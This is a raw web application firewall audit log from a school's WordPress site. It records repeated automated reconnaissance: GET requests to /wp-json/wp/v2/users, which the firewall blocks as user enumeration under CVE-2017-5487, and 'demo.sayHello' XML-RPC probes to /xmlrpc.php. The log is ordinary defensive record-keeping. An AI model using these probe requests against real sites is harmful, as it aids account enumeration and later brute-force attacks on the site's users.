"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459494200793 2552 (- - -) Stopwatch2: 1746459494200793 2552; combined=1247, p1=407, p2=811, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8259d311-Z-- --b467e441-A-- [05/May/2025:22:38:16 +0700] aBjbaARwKNFSM6B7_LabygAAAIY 103.236.140.4 56274 103.236.140.4 8181 --b467e441-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.146 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b467e441-C-- demo.sayHello --b467e441-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b467e441-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459496936905 6797 (- - -) Stopwatch2: 1746459496936905 6797; combined=4988, p1=632, p2=4106, p3=40, p4=45, p5=99, sr=97, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b467e441-Z-- --8530815a-A-- [05/May/2025:22:38:26 +0700] aBjbcgRwKNFSM6B7_LabzAAAAI0 103.236.140.4 56374 103.236.140.4 8181 --8530815a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8530815a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8530815a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459506126968 3427 (- - -) Stopwatch2: 1746459506126968 3427; combined=1488, p1=500, p2=951, p3=0, p4=0, p5=37, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8530815a-Z-- --93c72418-A-- [05/May/2025:22:38:29 +0700] aBjbdU2V_h1VFAgsfgZ3wgAAAAU 103.236.140.4 56410 103.236.140.4 8181 --93c72418-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --93c72418-C-- demo.sayHello --93c72418-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --93c72418-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459509589204 5278 (- - -) Stopwatch2: 1746459509589204 5278; combined=4203, p1=500, p2=3484, p3=32, p4=34, p5=91, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93c72418-Z-- --cf4cd676-A-- [05/May/2025:22:38:32 +0700] aBjbeARwKNFSM6B7_LabzgAAAIo 103.236.140.4 56442 103.236.140.4 8181 --cf4cd676-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cf4cd676-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf4cd676-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459512646948 2911 (- - -) Stopwatch2: 1746459512646948 2911; combined=1478, p1=487, p2=959, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf4cd676-Z-- --3d0b1813-A-- [05/May/2025:22:38:35 +0700] aBjbe_ZJDMuQndL03JNWVQAAAFA 103.236.140.4 56466 103.236.140.4 8181 --3d0b1813-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d0b1813-C-- demo.sayHello --3d0b1813-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d0b1813-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459515452547 5838 (- - -) Stopwatch2: 1746459515452547 5838; combined=4050, p1=572, p2=3264, p3=33, p4=38, p5=84, sr=110, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d0b1813-Z-- --18981652-A-- [05/May/2025:22:38:35 +0700] aBjbe4ZWvR7-42f6JrAHfQAAANc 103.236.140.4 56468 103.236.140.4 8181 --18981652-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --18981652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18981652-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459515533779 3217 (- - -) Stopwatch2: 1746459515533779 3217; combined=1437, p1=494, p2=908, p3=0, p4=0, p5=35, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18981652-Z-- --a7b7c726-A-- [05/May/2025:22:38:38 +0700] aBjbfgRwKNFSM6B7_Lab1AAAAIk 103.236.140.4 56502 103.236.140.4 8181 --a7b7c726-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7b7c726-C-- demo.sayHello --a7b7c726-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7b7c726-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459518264386 6111 (- - -) Stopwatch2: 1746459518264386 6111; combined=4384, p1=522, p2=3624, p3=32, p4=34, p5=100, sr=75, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7b7c726-Z-- --2fd6546f-A-- [05/May/2025:22:38:38 +0700] aBjbfgRwKNFSM6B7_Lab1QAAAJY 103.236.140.4 56508 103.236.140.4 8181 --2fd6546f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2fd6546f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fd6546f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459518698862 2433 (- - -) Stopwatch2: 1746459518698862 2433; combined=1339, p1=454, p2=855, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fd6546f-Z-- --0839be67-A-- [05/May/2025:22:38:42 +0700] aBjbggRwKNFSM6B7_Lab4AAAAIQ 103.236.140.4 56546 103.236.140.4 8181 --0839be67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0839be67-C-- demo.sayHello --0839be67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0839be67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459522017405 5684 (- - -) Stopwatch2: 1746459522017405 5684; combined=4363, p1=510, p2=3578, p3=32, p4=36, p5=123, sr=73, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0839be67-Z-- --1076ce50-A-- [05/May/2025:22:38:56 +0700] aBjbkPZJDMuQndL03JNWcQAAAEo 103.236.140.4 56682 103.236.140.4 8181 --1076ce50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1076ce50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1076ce50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459536994193 2568 (- - -) Stopwatch2: 1746459536994193 2568; combined=1426, p1=450, p2=945, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1076ce50-Z-- --e1bdd25a-A-- [05/May/2025:22:38:59 +0700] aBjbk02V_h1VFAgsfgZ30wAAABM 103.236.140.4 56706 103.236.140.4 8181 --e1bdd25a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e1bdd25a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1bdd25a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459539119000 2500 (- - -) Stopwatch2: 1746459539119000 2500; combined=1206, p1=419, p2=759, p3=0, p4=0, p5=28, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1bdd25a-Z-- --d2980020-A-- [05/May/2025:22:38:59 +0700] aBjbk_ZJDMuQndL03JNWcgAAAEk 103.236.140.4 56712 103.236.140.4 8181 --d2980020-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d2980020-C-- demo.sayHello --d2980020-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2980020-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459539844566 4990 (- - -) Stopwatch2: 1746459539844566 4990; combined=3928, p1=493, p2=3207, p3=28, p4=30, p5=98, sr=73, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2980020-Z-- --f16e8438-A-- [05/May/2025:22:39:01 +0700] aBjblYZWvR7-42f6JrAHggAAANE 103.236.140.4 56738 103.236.140.4 8181 --f16e8438-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f16e8438-C-- demo.sayHello --f16e8438-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f16e8438-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459541881373 5031 (- - -) Stopwatch2: 1746459541881373 5031; combined=4070, p1=516, p2=3305, p3=37, p4=39, p5=100, sr=65, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f16e8438-Z-- --bd4d4b3b-A-- [05/May/2025:22:39:18 +0700] aBjbpk2V_h1VFAgsfgZ33wAAAAM 103.236.140.4 56850 103.236.140.4 8181 --bd4d4b3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd4d4b3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd4d4b3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459558185239 3457 (- - -) Stopwatch2: 1746459558185239 3457; combined=1461, p1=479, p2=947, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd4d4b3b-Z-- --440a6b11-A-- [05/May/2025:22:39:20 +0700] aBjbqE2V_h1VFAgsfgZ35AAAABg 103.236.140.4 56866 103.236.140.4 8181 --440a6b11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --440a6b11-C-- demo.sayHello --440a6b11-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --440a6b11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459560925001 5298 (- - -) Stopwatch2: 1746459560925001 5298; combined=4340, p1=506, p2=3596, p3=35, p4=36, p5=98, sr=85, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --440a6b11-Z-- --4ae4a162-A-- [05/May/2025:22:39:24 +0700] aBjbrE2V_h1VFAgsfgZ37QAAAAs 103.236.140.4 56902 103.236.140.4 8181 --4ae4a162-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4ae4a162-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ae4a162-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459564947938 2702 (- - -) Stopwatch2: 1746459564947938 2702; combined=1234, p1=422, p2=779, p3=0, p4=0, p5=32, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
